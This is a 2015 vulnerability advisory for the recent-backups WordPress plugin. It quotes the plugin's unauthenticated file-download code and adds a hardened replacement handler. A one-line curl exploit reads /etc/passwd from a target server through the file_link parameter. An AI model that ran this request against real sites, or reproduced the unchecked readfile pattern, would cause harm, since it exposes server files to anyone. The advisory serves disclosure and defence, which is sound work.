Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-13
Download Site: https://wordpress.org/plugins/recent-backups
Vendor: https://profiles.wordpress.org/andycheeseman/
Vendor Notified: 0000-00-00
Vendor Contact: plugins@wordpress.org

Description:
To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.

Vulnerability:
The code in download-file.php neither checks that the requester is logged in nor restricts which file may be downloaded. The file_link query parameter is passed straight to file_exists() and readfile() with no capability check, no nonce and no path restriction, and the script can be requested directly by URL (see the exploit below). An unauthenticated remote user can therefore read any file the web server process has permission to read, including sensitive system files:

<?php
// Attacker-controlled path taken verbatim from the query string; no
// authentication or capability check precedes it.
$file = $_GET['file_link'];

if (file_exists($file)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    // Streams whatever file was named, e.g. /etc/passwd, to the client.
    readfile($file);
}

CVEID:
OSVDB:

Exploit Code:
$ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd"
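For comparison, the following is a hardened version of the download handler. It is an example added to this advisory, not code from the recent-backups plugin or its author, and it fixes the three defects above: the download is routed through wp-admin/admin-post.php so WordPress is loaded and the caller must be a logged-in administrator, the link carries a nonce, and only a bare file name inside the backup directory is accepted. The action name recent_backups_download, the file query parameter and the constant RECENT_BACKUPS_DIR (standing in for wherever the real plugin locates the BackupWordPress backup directory) are assumptions made for the example.

```php
<?php
/*
 * Hardened download handler (added example, not the plugin's own code).
 * Served via admin-post.php instead of a directly requested PHP file, so
 * WordPress is bootstrapped and the user is authenticated before any of
 * this runs. RECENT_BACKUPS_DIR is a hypothetical constant assumed to
 * hold the absolute path of the backup directory the widget lists.
 */

add_action( 'admin_post_recent_backups_download', 'recent_backups_download' );

function recent_backups_download() {
    // 1. Authentication and authorization. The admin_post_ hook (without the
    //    nopriv_ prefix) already requires a login; the capability check keeps
    //    subscribers and contributors away from backup archives.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.', '', array( 'response' => 403 ) );
    }

    // 2. CSRF protection: the widget link must carry a nonce bound to the
    //    action name (see recent_backups_download_url below).
    check_admin_referer( 'recent_backups_download' );

    // 3. Accept a file name only, never a path. basename() drops every
    //    directory component, so "../../etc/passwd" collapses to "passwd",
    //    and dotfiles such as .htaccess are refused outright.
    $name = isset( $_GET['file'] ) ? basename( wp_unslash( $_GET['file'] ) ) : '';
    if ( $name === '' || $name[0] === '.' ) {
        wp_die( 'Invalid file name.', '', array( 'response' => 400 ) );
    }

    // 4. Canonicalise and confine. realpath() resolves symlinks and "..", so
    //    the final comparison is against the real location of the file.
    $backup_dir = realpath( RECENT_BACKUPS_DIR ); // hypothetical constant
    $path       = ( $backup_dir !== false )
        ? realpath( $backup_dir . DIRECTORY_SEPARATOR . $name )
        : false;

    if ( $backup_dir === false || $path === false
        || strpos( $path, $backup_dir . DIRECTORY_SEPARATOR ) !== 0
        || ! is_file( $path )
        || ! preg_match( '/\.(zip|tar\.gz|tgz)$/i', $name ) ) {
        // Deliberately vague: do not confirm whether a path exists.
        wp_die( 'No such backup.', '', array( 'response' => 404 ) );
    }

    // 5. Serve the file. Same headers as the original handler, but the
    //    Content-Disposition name is the validated $name and the path is
    //    the canonical one inside the backup directory.
    nocache_headers();
    header( 'Content-Description: File Transfer' );
    header( 'Content-Type: application/octet-stream' );
    header( 'Content-Disposition: attachment; filename="' . $name . '"' );
    header( 'Content-Transfer-Encoding: binary' );
    header( 'Content-Length: ' . filesize( $path ) );
    ob_clean();
    flush();
    readfile( $path );
    exit;
}

/*
 * URL to place in the dashboard widget for a given backup file name.
 * wp_nonce_url() appends the _wpnonce value that check_admin_referer()
 * verifies above.
 */
function recent_backups_download_url( $name ) {
    return wp_nonce_url(
        add_query_arg(
            array(
                'action' => 'recent_backups_download',
                'file'   => basename( $name ),
            ),
            admin_url( 'admin-post.php' )
        ),
        'recent_backups_download'
    );
}
```

With this in place the original request pattern no longer works: download-file.php is not served at all, an anonymous request to admin-post.php with the action is redirected to the login page before the handler runs, and a logged-in user supplying file_link=/etc/passwd or file=../../../etc/passwd receives a 404 because the canonicalised path is outside the backup directory. The extension whitelist is a defence in depth layer so that even a file dropped into the backup directory by another component cannot be fetched unless it is a backup archive.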